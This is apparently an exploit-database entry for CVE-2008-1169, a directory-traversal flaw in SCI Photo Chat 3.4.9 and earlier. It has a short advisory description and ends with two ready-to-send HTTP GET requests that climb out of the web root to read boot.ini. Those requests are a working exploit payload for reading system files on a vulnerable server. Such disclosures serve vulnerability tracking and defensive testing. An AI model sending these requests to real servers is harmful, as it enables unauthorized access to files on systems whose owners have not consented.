SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal

Author: Luigi Auriemma
type: remote
platform: windows
port: 
date_added: 2008-02-19 
date_updated: 2014-01-28 
verified: 1 
codes: CVE-2008-1169;OSVDB-43071 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/27872/info

SCI Photo Chat is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.

This issue affects SCI Photo Chat 3.4.9 and prior versions.

GET /docs/..\..\..\..\..\boot.ini HTTP/1.0
GET /docs/../../../../../boot.ini HTTP/1.0